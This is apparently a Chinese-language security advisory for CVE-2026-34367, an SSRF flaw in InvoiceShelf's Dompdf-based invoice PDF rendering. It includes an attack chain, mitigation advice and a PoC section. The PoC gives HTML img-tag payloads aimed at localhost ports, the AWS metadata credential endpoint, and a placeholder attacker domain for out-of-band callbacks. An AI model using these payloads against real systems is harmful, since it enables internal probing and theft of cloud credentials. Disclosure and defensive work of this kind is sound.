CVE-2026-34367 CVSS 7.6 高危

CVE-2026-34367 InvoiceShelf存在SSRF漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34367

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

InvoiceShelf

漏洞概述

InvoiceShelf是一款开源的Web和移动端应用，主要用于费用跟踪和发票管理。在2.2.0版本之前，该应用存在服务器端请求伪造（SSRF）漏洞。漏洞根源在于发票PDF生成模块未对用户在“发票备注”字段中输入的HTML内容进行充分清理。攻击者可利用PDF预览或邮件投递端点，诱导后端Dompdf库主动获取HTML标记中引用的远程资源，从而触发SSRF攻击。

技术细节

该漏洞的核心机制在于InvoiceShelf集成了Dompdf库用于将HTML渲染为PDF文档，而Dompdf在处理HTML时会默认尝试获取并加载其中的外部资源链接（如图片、CSS样式表等）。在受影响版本中，系统未对用户输入的“发票备注”字段内容进行有效的HTML净化处理。攻击者若拥有高权限账户，可在编辑发票时注入包含恶意URL的HTML标签（例如`<img>`标签）。当系统触发PDF预览或邮件投递功能时，Dompdf引擎会解析这段HTML，并向攻击者指定的内网地址（如127.0.0.1、169.254.169.254）发起HTTP请求。由于请求发自服务器端，攻击者可借此绕过防火墙限制，探测内网服务端口、读取本地敏感文件或利用云元数据服务窃取凭证，造成严重的信息泄露风险。

攻击链分析

STEP 1

步骤1：获取权限

攻击者需要获取InvoiceShelf平台的高权限账户（如管理员账户），以便能够编辑发票。

STEP 2

步骤2：构造 payload

攻击者在创建或编辑发票时，在“Notes”字段中插入包含恶意URL的HTML标签（如<img src="http://internal-server">）。

STEP 3

步骤3：触发渲染

攻击者点击PDF预览或触发邮件投递功能，促使服务器端调用Dompdf库渲染发票内容。

STEP 4

步骤4：执行请求

Dompdf引擎解析HTML，向攻击者指定的内网地址发起HTTP请求，从而实现SSRF攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-34367 -->
<!-- Inject this payload into the 'Notes' field of an invoice -->

<!-- 1. Test for internal port scanning (e.g., port 8080) -->
<img src="http://127.0.0.1:8080" />

<!-- 2. Attempt to access AWS metadata (if hosted on AWS) -->
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" />

<!-- 3. Fetch external resource to verify outband connection -->
<img src="http://attacker-controlled-domain.com/cve-2026-34367.jpg" />

影响范围

InvoiceShelf < 2.2.0

防御指南

临时缓解措施

如果无法立即升级，建议在服务器防火墙层面限制应用进程对内网敏感地址段（如127.0.0.0/8, 169.254.169.254/32等）的访问。同时，应在应用层面对“Notes”字段实施正则匹配或HTML解析过滤，移除或转义可能导致外部资源加载的HTML标签（如<img>, <link>等），以阻断漏洞利用路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表